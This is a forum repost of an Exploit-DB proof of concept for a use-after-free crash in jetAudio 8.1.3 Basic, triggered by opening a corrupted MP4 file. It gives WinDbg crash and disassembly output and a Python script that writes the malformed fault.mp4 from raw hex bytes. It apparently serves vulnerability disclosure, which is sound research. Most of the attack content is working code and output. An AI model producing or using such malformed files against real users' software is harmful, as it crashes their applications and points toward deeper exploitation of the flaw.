- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35827
- Проверка EDB
-
- Пройдено
- Автор
- DROZDOVA LIUDMILA
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2014-12-12
Код:
# Exploit Title : jetAudio 8.1.3 Basic Use-after-free (Corrupted mp4) Crash POC
# Product : jetAudio Basic
# Date : 12.12.2014
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (fault.mp4) with jetAudio
# Details
# (6e74.6e20): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11 mov edx,dword ptr [ecx] ds:002b:050aacf8=????????
#0:000:x86> kb
#ChildEBP RetAddr Args to Child
#WARNING: Stack unwind information not available. Following frames may be wrong.
#0018feec 72512466 00000000 00000000 00000000 JFDSPL!JPluginCreate+0x338f8
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for JetAudio.exe -
#0018ff00 005961ba 00000000 f9b7337c 00000000 MSVCR90!exit+0x11
#0018ff88 7558338a 7efde000 0018ffd4 771e9f72 JetAudio!CxIOFile::~CxIOFile+0x19414a
#0018ff94 771e9f72 7efde000 765bba31 00000000 kernel32!BaseThreadInitThunk+0xe
#0018ffd4 771e9f45 00596315 7efde000 00000000 ntdll32!__RtlUserThreadStart+0x70
#0018ffec 00000000 00596315 7efde000 00000000 ntdll32!_RtlUserThreadStart+0x1b
#0:000:x86> u 0a1a7588
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11 mov edx,dword ptr [ecx]
#0a1a758a 8b420c mov eax,dword ptr [edx+0Ch]
#0a1a758d 6a01 push 1
#0a1a758f 6870ff1d0a push offset JFDSPL!CxIOFile::~CxIOFile+0x303e0 (0a1dff70)
#0a1a7594 ffd0 call eax
#0a1a7596 6aff push 0FFFFFFFFh
#0a1a7598 6a00 push 0
#0a1a759a 8d8e043d0000 lea ecx,[esi+3D04h]
#============================================================================================
#!/usr/bin/python
pocdata=("\x00\x00\x00\xFA\x66\x74\x79\x70\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x00\x00\x00\x00\x6D\x70\x34\x32\x69\x73\x6F\x6D\x61\x76\x63\x31\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x6D\x70\x34\x32\x00\x00")
mp4file = "fault.mp4"
file = open(mp4file,"w")
file.write(pocdata)
file.close()
- Источник
- www.exploit-db.com